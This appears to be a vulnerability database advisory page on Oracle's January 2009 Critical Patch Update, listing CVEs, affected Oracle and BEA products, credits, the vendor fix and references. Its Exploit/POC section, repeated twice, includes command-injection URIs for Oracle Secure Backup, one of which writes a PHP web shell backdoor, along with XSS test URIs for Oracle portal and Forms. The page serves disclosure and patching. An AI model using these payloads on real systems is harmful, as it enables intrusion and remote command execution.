Oracle January 2009 Critical Patch Update Multiple Vulnerabilities
BID:33177
Info
Oracle January 2009 Critical Patch Update Multiple Vulnerabilities
| Bugtraq ID: | 33177 |
| Class: | Unknown |
| CVE: |
CVE-2008-5463 CVE-2008-5462 CVE-2008-5461 CVE-2008-5460 CVE-2008-5459 CVE-2008-5458 CVE-2008-5457 CVE-2008-5456 CVE-2008-5455 CVE-2008-5454 CVE-2008-5452 CVE-2008-5451 CVE-2008-5450 CVE-2008-5449 CVE-2008-5448 CVE-2008-5447 CVE-2008-5446 CVE-2008-5445 CVE-2008-5444 CVE-2008-5443 CVE-2008-5442 CVE-2008-5441 CVE-2008-5440 CVE-2008-5439 CVE-2008-5438 CVE-2008-5437 CVE-2008-5436 CVE-2008-4017 CVE-2008-4016 CVE-2008-4015 CVE-2008-4014 CVE-2008-4007 CVE-2008-4006 CVE-2008-3999 CVE-2008-3997 CVE-2008-3981 CVE-2008-3979 CVE-2008-3978 CVE-2008-3974 CVE-2008-3973 CVE-2008-2623 |
| Remote: | Yes |
| Local: | Yes |
| Published: | Jan 08 2009 12:00AM |
| Updated: | Sep 14 2009 05:31PM |
| Credit: | Deniz Cevik of Intellect; Andy Davis of Information Risk Management Plc (IRM Plc); Esteban Martinez Fayo of Application Security, Inc.; Franz Huell of Red Database Security; Wasim Iqbal; Joxean Koret; Joxean Koret of TippingPoint (3com); Alexander Kornbrus |
| Vulnerable: |
Oracle TimesTen In-Memory Database 7.0.5.4.0 Oracle TimesTen In-Memory Database 7.0.5.3.0 Oracle TimesTen In-Memory Database 7.0.5.2.0 Oracle TimesTen In-Memory Database 7.0.5.1.0 Oracle Secure Backup 10.2.0.3 Oracle Secure Backup 10.2.0.2 Oracle Secure Backup 10.1.0.3 Oracle Secure Backup 10.1.0.2 Oracle Secure Backup 10.1.0.1 Oracle Oracle9i Standard Edition 9.2 .8DV Oracle Oracle9i Standard Edition 9.2 .8 Oracle Oracle9i Personal Edition 9.2 .8DV Oracle Oracle9i Personal Edition 9.2 .8 Oracle Oracle9i Enterprise Edition 9.2 .8DV Oracle Oracle9i Enterprise Edition 9.2 .8.0 Oracle Oracle11g Standard Edition One 11.1 6 Oracle Oracle11g Standard Edition 11.1 6 Oracle Oracle11g Standard Edition 11.1 6 Oracle Oracle11g Enterprise Edition 11.1 6 Oracle Oracle10g Standard Edition 10.2 .3 Oracle Oracle10g Standard Edition 10.2 .2 Oracle Oracle10g Standard Edition 10.1 .5 Oracle Oracle10g Standard Edition 10.2.0.4 Oracle Oracle10g Personal Edition 10.2 .3 Oracle Oracle10g Personal Edition 10.2 .2 Oracle Oracle10g Personal Edition 10.1 .5 Oracle Oracle10g Personal Edition 10.2.0.4 Oracle Oracle10g Enterprise Edition 10.2 .3 Oracle Oracle10g Enterprise Edition 10.2 .2 Oracle Oracle10g Enterprise Edition 10.1 .5 Oracle Oracle10g Enterprise Edition 10.2.0.4 Oracle Oracle10g Enterprise Edition 10.2.0.2 64 bit Oracle Oracle10g Application Server 10.1.3 .3.0 Oracle Oracle10g Application Server 10.1.2 .2.0 Oracle Oracle10g Application Server 10.1.2.3.0 Oracle Enterprise Manager Grid Control 10g 10.2.0.4 Oracle E-Business Suite 11i 11.5.10.2 Oracle E-Business Suite 12.0.6 Oracle Collaboration Suite Release 1 10.1.2 BEA Systems Weblogic Server 8.1 SP 6 BEA Systems Weblogic Server 8.1 SP 5 BEA Systems Weblogic Server 8.1 SP 4 BEA Systems Weblogic Server 8.1 SP 3 BEA Systems Weblogic Server 8.1 SP 2 BEA Systems Weblogic Server 8.1 SP 1 BEA Systems Weblogic Server 8.1 BEA Systems Weblogic Server 7.0 .0.1 SP 4 BEA Systems Weblogic Server 7.0 .0.1 SP 3 BEA Systems Weblogic Server 7.0 .0.1 SP 2 BEA Systems Weblogic Server 7.0 .0.1 SP 1 BEA Systems Weblogic Server 7.0 .0.1 BEA Systems Weblogic Server 7.0 SP 7 BEA Systems Weblogic Server 7.0 SP 6 BEA Systems Weblogic Server 7.0 SP 5 BEA Systems Weblogic Server 7.0 SP 4 BEA Systems Weblogic Server 7.0 SP 3 BEA Systems Weblogic Server 7.0 SP 2 BEA Systems Weblogic Server 7.0 SP 1 BEA Systems Weblogic Server 7.0 BEA Systems Weblogic Server 9.2 Maintenance Pack BEA Systems Weblogic Server 9.2 BEA Systems Weblogic Server 9.1 BEA Systems Weblogic Server 9.1 BEA Systems Weblogic Server 9.0 BEA Systems Weblogic Server 8.1 BEA Systems Weblogic Server 7.0 SP7 BEA Systems Weblogic Server 10.3 BEA Systems Weblogic Server 10.3 BEA Systems Weblogic Server 10.0 MP1 BEA Systems Weblogic Server 10.0 BEA Systems Weblogic Server 10.0 BEA Systems WebLogic Portal 8.1 SP6 BEA Systems WebLogic Portal 8.1 SP5 BEA Systems WebLogic Portal 8.1 SP4 BEA Systems WebLogic Portal 8.1 SP3 BEA Systems WebLogic Portal 8.1 SP2 BEA Systems WebLogic Portal 8.1 SP1 BEA Systems WebLogic Portal 8.1 BEA Systems WebLogic Portal 9.2 MP3 BEA Systems WebLogic Portal 9.2 BEA Systems WebLogic Portal 10.3 BEA Systems WebLogic Portal 10.2 BEA Systems WebLogic Portal 10.0 MP1 BEA Systems WebLogic Portal 10.0 |
| Not Vulnerable: | |
Discussion
Oracle January 2009 Critical Patch Update Multiple Vulnerabilities
Oracle has released the January 2009 critical patch update. The update addresses 41 vulnerabilities affecting the following software:
Oracle Database
Oracle Secure Backup
Oracle TimesTen In-Memory Database
Oracle Application Server
Oracle Collaboration Suite
Oracle E-Business Suite Release
Oracle Enterprise Manager Grid Control
PeopleSoft Enterprise HRMS
JD Edwards Tools
Oracle WebLogic Server (formerly BEA WebLogic Server)
Oracle WebLogic Portal (formerly BEA WebLogic Portal)
Oracle has released the January 2009 critical patch update. The update addresses 41 vulnerabilities affecting the following software:
Oracle Database
Oracle Secure Backup
Oracle TimesTen In-Memory Database
Oracle Application Server
Oracle Collaboration Suite
Oracle E-Business Suite Release
Oracle Enterprise Manager Grid Control
PeopleSoft Enterprise HRMS
JD Edwards Tools
Oracle WebLogic Server (formerly BEA WebLogic Server)
Oracle WebLogic Portal (formerly BEA WebLogic Portal)
Exploit / POC
Oracle January 2009 Critical Patch Update Multiple Vulnerabilities
Some of these issues may not require specific exploit code and may be trivial to exploit.
Core Security Technologies has developed working commercial exploits for its CORE IMPACT product for the issues documented by CVE-2008-5449 and CVE-2008-5457. These exploits are not otherwise publicly available or known to be circulating in the wild.
The following proof-of-concept URIs are available for Oracle Secure Backup:
1. Create a file in the directory "c:\":
https://www.example.com/login.php?clear=no&ora_osb_lcookie=aa&ora_osb_bgcookie=bb&button=Logout&rbtool=cmd.exe+/c+echo+hello+world+%3E+c:\oracle.secure.backup.txt+;
2. Create a PHP backdoor:
https://www.example.com/login.php?clear=no&ora_osb_lcookie=aa&ora_osb_bgcookie=bb&button=Logout&rbtool=cmd.exe+/c+echo+%22%3C%3Fphp+print(shell_exec(%24_GET%5B'a'%5D))%3B+%3F%3E%22+%3E+test.php%3B%26%26+echo
The following example URI is available for the Oracle Application Server portal:
http://www.example.com/sso/jsp/login.jsp?site2pstoretoken=XSS
PORTAL&search_type=XSS
The following example URI is available for Oracle Forms:
http://www.example.com/ifcgi60.exe?form=XSS
The following exploits and proof of concept are available:
Some of these issues may not require specific exploit code and may be trivial to exploit.
Core Security Technologies has developed working commercial exploits for its CORE IMPACT product for the issues documented by CVE-2008-5449 and CVE-2008-5457. These exploits are not otherwise publicly available or known to be circulating in the wild.
The following proof-of-concept URIs are available for Oracle Secure Backup:
1. Create a file in the directory "c:\":
https://www.example.com/login.php?clear=no&ora_osb_lcookie=aa&ora_osb_bgcookie=bb&button=Logout&rbtool=cmd.exe+/c+echo+hello+world+%3E+c:\oracle.secure.backup.txt+;
2. Create a PHP backdoor:
https://www.example.com/login.php?clear=no&ora_osb_lcookie=aa&ora_osb_bgcookie=bb&button=Logout&rbtool=cmd.exe+/c+echo+%22%3C%3Fphp+print(shell_exec(%24_GET%5B'a'%5D))%3B+%3F%3E%22+%3E+test.php%3B%26%26+echo
The following example URI is available for the Oracle Application Server portal:
http://www.example.com/sso/jsp/login.jsp?site2pstoretoken=XSS
PORTAL&search_type=XSS
The following example URI is available for Oracle Forms:
http://www.example.com/ifcgi60.exe?form=XSS
The following exploits and proof of concept are available:
Solution / Fix
Oracle January 2009 Critical Patch Update Multiple Vulnerabilities
Solution:
Oracle has released CPUJan2009 (Critical Patch Update January 2009) to address these issues. Contact the vendor for details on obtaining and applying the appropriate updates.
Solution:
Oracle has released CPUJan2009 (Critical Patch Update January 2009) to address these issues. Contact the vendor for details on obtaining and applying the appropriate updates.
References
Oracle January 2009 Critical Patch Update Multiple Vulnerabilities
References:
References:
- ACROS Security Problem Report #2009-01-27-1 (ACROS)
- Assurent VR - Oracle BEA WebLogic Server Apache Connector Buffer Overflow (Assurent)
- CVE -2008- 5446 Sensitive Information Disclosure (SecNiche)
- Oracle Critical Patch Update - January 2009 - E-Business Suite Impact (Integrigy)
- Oracle Database 10g R2 Summary Advisor Arbitrary File Rewrite Vulnerability (iDefense Labs )
- Oracle Homepage (Oracle)
- Oracle Secure Backup 10g Remote Code Execution (Joxean Koret)
- Oracle Secure Backup Administration Server login.php Command Injection Vulnerabi (iDefense)
- Oracle Secure Backup Administration Server login.php Command Injection Vulnerabi (iDefense)
- Oracle Secure Backup Administration Server login.php Command Injection Vulnerabi (iDefense Labs )
- ACROS Security: HTML Injection in BEA (Oracle) WebLogic Server Console (ASPR #20 ("ACROS Security"
) - Advisory: Oracle EBusiness Suite Sensitive Information Disclosure (SecNiche)
- Advisory: Oracle EBusiness Suite Sensitive Information Disclosure Vulnerability (Aditya K Sood <[email protected]>)
- iDefense Security Advisory 01.13.09: Oracle Database 10g R2 Summary Advisor Arbi (iDefense Labs
) - iDefense Security Advisory 01.13.09: Oracle Secure Backup Administration Server (iDefense Labs
) - iDefense Security Advisory 01.13.09: Oracle Secure Backup Administration Server (iDefense Labs
) - Oracle Application Server 10g Cross Site Scripting Vulnerability ([email protected])
- Oracle CPU Jan 2009 Advisories (Alexandr Polyakov
) - Oracle Forms Cross site Scripting in (iFcgi60.exe / f60servlet) ([email protected])
- Oracle Secure Backup 10g Remote Code Execution (Joxean Koret
) - Oracle Secure Backup Multiple Denial Of Service vulnerabilities ("[email protected]"
) - Oracle Secure Backup NDMP_CONECT_CLIENT_AUTH Command Buffer Overflow Vulnerabili ("[email protected]"
) - Oracle Secure Backup's observiced.exe Denial Of Service vulnerability ("[email protected]"
) - Oracle TimesTen Remote Format String (Joxean Koret
) - Re: iDefense Security Advisory 01.13.09: Oracle Secure Backup Administration Ser (security curmudgeon
) - Team SHATTER Security Advisory: Oracle Database Buffer Overflow in SYS.OLAPIMPL_ (Shatter
) - Team SHATTER Security Advisory: SQL Injection in Oracle Enterprise Manager (Shatter
) - Trigger Abuse of MDSYS.SDO_TOPO_DROP_FTBL in Oracle 10g R1 and R2 ("David Litchfield"
) - Trigger Abuse of MDSYS.SDO_TOPO_DROP_FTBL in Oracle 10g R1 and R2 (David Litchfield)
- ZDI-09-003: Oracle Secure Backup exec_qr() Command Injection Vulnerability ([email protected])
- ZDI-09-004: Oracle TimesTen evtdump Remote Format String Vulnerability ([email protected])
- Oracle Critical Patch Update Advisory - January 2009 (Oracle)
- Oracle Critical Patch Update Pre-Release Announcement - January 2009 (Oracle)
- Oracle TimesTen Remote Format String (Joxean Koret)
- SECURITY ADVISORY (CVE-2008-5457) (BEA)
- SECURITY ADVISORY (CVE-2008-5459) (BEA)
- SECURITY ADVISORY (CVE-2008-5460) (BEA)
- SECURITY ADVISORY (CVE-2008-5461) (BEA)
- SECURITY ADVISORY (CVE-2008-5462) (BEA)
- ZDI-09-003 Oracle Secure Backup exec_qr() Command Injection Vulnerability (ZDI)
- ZDI-09-004 Oracle TimesTen evtdump Remote Format String Vulnerability (ZDI)